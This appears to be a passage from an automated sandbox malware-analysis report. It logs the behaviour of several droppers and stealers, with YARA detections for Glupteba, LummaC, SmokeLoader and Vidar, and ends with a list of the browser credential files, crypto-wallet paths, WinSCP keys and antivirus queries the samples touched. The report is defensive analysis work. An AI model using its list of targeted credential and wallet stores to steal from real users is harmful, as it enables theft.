            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,16_2_028A49EA
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,16_2_028A394D
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,16_2_028A3F87
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,17_2_0043404A
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,17_2_00438178
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,17_2_00440116
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_004382A2
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: GetLocaleInfoW,_GetPrimaryLen,17_2_0043834F
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,17_2_00438423
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,17_2_004335E7
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: EnumSystemLocalesW,17_2_004387C8
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: GetLocaleInfoW,17_2_0043884E
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,17_2_00432B6D
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,17_2_00437BB3
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: EnumSystemLocalesW,17_2_00437E27
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,17_2_00437E83
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,17_2_00437F00
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,17_2_0042BF17
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,17_2_00437F83
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,17_2_00432FAD
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_00408E0C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_00408E0C
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,12_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_0042FE47
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,12_2_00419F90
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: explorer.exe, 00000022.00000002.4542597682.000000000952E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.4414268907.000000000952E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MSASCui.exe
            Source: build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rogramFiles%\Windows Defender\MsMpeng.exe
            Source: A0B.exe, 00000017.00000003.3112719948.000000000150A000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3115022315.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3125581472.000000000150C000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3074902225.0000000001509000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3075117342.0000000001503000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000003.3113069139.0000000001503000.00000004.00000020.00020000.00000000.sdmp, A0B.exe, 00000017.00000002.3125433405.0000000001504000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: build2.exe, 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected Clipboard Hijacker
            Source: Yara matchFile source: 43.2.build3.exe.24115a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000002B.00000002.3313329838.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Yara detected Glupteba
            Source: Yara matchFile source: 44.3.71C9.exe.39e0000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 29.2.71C9.exe.3190e67.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 44.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 44.2.71C9.exe.30f0e67.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 29.3.71C9.exe.3a80000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 29.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000003.3174084489.0000000003E22000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002C.00000002.4516603892.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 71C9.exe PID: 6944, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 71C9.exe PID: 3208, type: MEMORYSTR
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: A0B.exe PID: 5352, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Yara detected SmokeLoader
            Source: Yara matchFile source: 00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2358489940.0000000002741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2120318342.0000000000CC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2120238789.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Yara detected Vidar
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Yara detected Vidar stealer
            Source: Yara matchFile source: 35.2.build2.exe.21d15a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 41.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 41.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 35.2.build2.exe.21d15a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.3157289895.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 5968, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 728, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: A0B.exe, 00000017.00000002.3122756378.0000000001138000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
            Source: A0B.exe, 00000017.00000002.3122756378.0000000001138000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
            Source: A0B.exe, 00000017.00000003.3011665657.00000000014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "m": ["app-store.json", ".finger-print.fp", "simple-storage.json", "window-state.json"],
            Source: A0B.exe, 00000017.00000003.3011665657.00000000014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
            Source: A0B.exe, 00000017.00000003.3112719948.000000000150A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Edge/Default/Extensions/ExodusWeb3
            Source: A0B.exe, 00000017.00000003.3011665657.00000000014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Ethereum",
            Source: A0B.exe, 00000017.00000002.3124595355.0000000001474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: A0B.exe, 00000017.00000003.3011665657.00000000014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "keystore"
            Tries to harvest and steal Bitcoin Wallet information
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
